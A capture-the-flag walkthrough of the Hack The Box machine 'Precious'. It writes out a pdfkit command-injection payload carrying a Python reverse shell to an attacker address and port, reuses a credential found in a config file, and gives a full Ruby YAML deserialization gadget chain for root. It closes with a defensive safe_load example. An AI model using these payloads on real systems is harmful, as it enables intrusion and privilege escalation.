HTB Machine Precious
Port scanning with nmap
Port 80 is open; it redirects to http://precious.htb/
Add precious.htb to /etc/hosts
On this page we have a Convert Web Page to PDF functionality
After giving a URL, a PDF file is downloaded
Running exiftool on the PDF shows that it was generated by pdfkit v0.8.6
This version is vulnerable to RCE
Payload:
http://%20`{command}`
We can use this to get a reverse shell:
http://%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
references: https://www.revshells.com/
We get a shell as user ruby
We can see two users in the /home directory
The user flag is in henry's home directory, but it is not accessible.
Inside ruby's home directory there is a config file in .bundle; in this file we can see the password of user henry
We can use this to SSH in as henry
henry can run /opt/update_dependencies.rb as root with sudo
This file is not writable. Looking at the code, we see it uses YAML.load, which is vulnerable to deserialization attacks.
We can write to dependencies.yml
Payload:
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cat /root/root.txt
         method_id: :resolve
reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml
Now we can run this with sudo and get the root flag: sudo /usr/bin/ruby /opt/update_dependencies.rb
This gives the root flag.
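The root cause of the privesc is YAML.load on a file the low-privileged user controls. As an added Ruby example (not the box's script), this puts the vulnerable call next to its fix: load_unsafe behaves like the script, load_safe is the corrected YAML.safe_load. The dependency file contents are constructed, and only the first tag of the payload above is used, which instantiates an object but runs nothing.

```ruby
require 'yaml'

# Constructed sample: the kind of dependency file a script like
# /opt/update_dependencies.rb would expect (names/versions made up).
BENIGN_YAML = <<~YAML
  - name: rails
    version: 7.0.4
  - name: nokogiri
    version: 1.13.10
YAML

# Constructed sample: the first gadget from the page's payload, on its own.
# It carries no command; it only shows that YAML.load instantiates whatever
# class the tag names, which is the primitive the full chain is built on.
TAGGED_YAML = <<~YAML
  - !ruby/object:Gem::Installer
    i: x
YAML

# Vulnerable behaviour: full object deserialization. Psych 4 (Ruby 3.1+)
# moved this to YAML.unsafe_load, so fall back to it when it exists.
def load_unsafe(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# Fix: safe_load only builds Hash/Array/String/Integer/Float/nil/true/false;
# any !ruby/object tag, symbol or alias raises instead of instantiating.
def load_safe(text)
  YAML.safe_load(text)
end

# Summarise what a loader did with a document:
#   :plain    - only plain data structures came back
#   :object   - a tagged entry became a live Ruby object
#   :rejected - the loader refused the document
def classify(loader, text)
  data = send(loader, text)
  plain = [Hash, Array, String, Integer, Float, NilClass, TrueClass, FalseClass]
  data.all? { |e| plain.any? { |k| e.is_a?(k) } } ? :plain : :object
rescue Psych::DisallowedClass, Psych::BadAlias
  :rejected
end

if $PROGRAM_NAME == __FILE__
  [BENIGN_YAML, TAGGED_YAML].each do |doc|
    puts "unsafe: #{classify(:load_unsafe, doc)}  safe: #{classify(:load_safe, doc)}"
  end
end
```

Both loaders accept the benign file; only the unsafe one turns the tagged entry into a Gem::Installer instance, which is exactly what the gadget chain relies on.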
:octocat: Happy Hacking :octocat: